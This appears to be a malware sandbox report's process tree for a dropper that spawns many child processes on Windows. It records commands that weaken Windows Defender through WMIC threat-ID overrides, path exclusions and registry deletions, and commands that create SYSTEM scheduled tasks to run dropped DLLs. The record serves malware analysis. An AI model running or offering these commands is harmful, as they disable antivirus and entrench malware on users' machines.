C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bvmcjEjDUxHOOxIZsK"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
- Blocklisted process makes network request
- Executes dropped EXE
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RQzLvVUNU\uyXldN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RulYNORIEfYpYdh" /V1 /F3⤵
- Checks for any installed AV software in registry
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RulYNORIEfYpYdh2" /F /xml "C:\Program Files (x86)\RQzLvVUNU\sbxBRSn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RulYNORIEfYpYdh"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RulYNORIEfYpYdh"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sQKEyxOvETjkhD" /F /xml "C:\Program Files (x86)\EHjpVGHxoTMU2\ttcxnvA.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LUNOxqyZdvVpf2" /F /xml "C:\ProgramData\NKsRZGTfNWtvCUVB\oqJEsDV.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "cXKEjEvxPbALHdiUE2" /F /xml "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\PvPZJEr.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "eoTgVxzVyVjpEcHcuxi2" /F /xml "C:\Program Files (x86)\DOWaNXZtDJLiC\eHWQFjn.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "TzpzstmaipgnuWYOU" /SC once /ST 16:01:46 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mlmrxyCihFugMjhe\hamLORxc\dumnGEw.dll\",#1 /site_id 394347" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TzpzstmaipgnuWYOU"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuTWhHjihUt" /SC once /ST 14:50:57 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZngWjrav\Igfukue.exe\" vm /S"3⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuTWhHjihUt"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuTWhHjihUt"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuTWhHjihUt"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YqJChhYnTMHzkMjCc"3⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\hamLORxc\dumnGEw.dll",#1 /site_id 3943472⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\hamLORxc\dumnGEw.dll",#1 /site_id 3943473⤵
- Checks BIOS information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TzpzstmaipgnuWYOU"4⤵
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZngWjrav\Igfukue.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZngWjrav\Igfukue.exe vm /S2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵
-
C:\Users\Admin\AppData\Roaming\aciavihC:\Users\Admin\AppData\Roaming\aciavih2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\aciavihC:\Users\Admin\AppData\Roaming\aciavih2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\aciavihC:\Users\Admin\AppData\Roaming\aciavih2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\uviavihC:\Users\Admin\AppData\Roaming\uviavih3⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\OnpGSK\OnpGSK.dll",OnpGSK2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exeC:\Users\Admin\AppData\Local\6119ec7f-c167-4e31-946b-c0e87ad60709\DCCF.exe --Task3⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed151f5e3fd2.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed151f5e3fd2.exeWed151f5e3fd2.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed15228d911b9d5c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC54B9F92\Wed15228d911b9d5c.exeWed15228d911b9d5c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\wXZz5xY9daoSOnWFCSX4abIE.exe"C:\Users\Admin\Documents\wXZz5xY9daoSOnWFCSX4abIE.exe"6⤵
-
C:\Users\Admin\Documents\wXZz5xY9daoSOnWFCSX4abIE.exe"C:\Users\Admin\Documents\wXZz5xY9daoSOnWFCSX4abIE.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\J65PCCvPvS2ky_CNToWrf1HB.exe"C:\Users\Admin\Documents\J65PCCvPvS2ky_CNToWrf1HB.exe"6⤵
-
C:\Users\Admin\Documents\UI0J7Z_KJJDw3RhdaPcWQ3IG.exe"C:\Users\Admin\Documents\UI0J7Z_KJJDw3RhdaPcWQ3IG.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS1411.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS223A.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
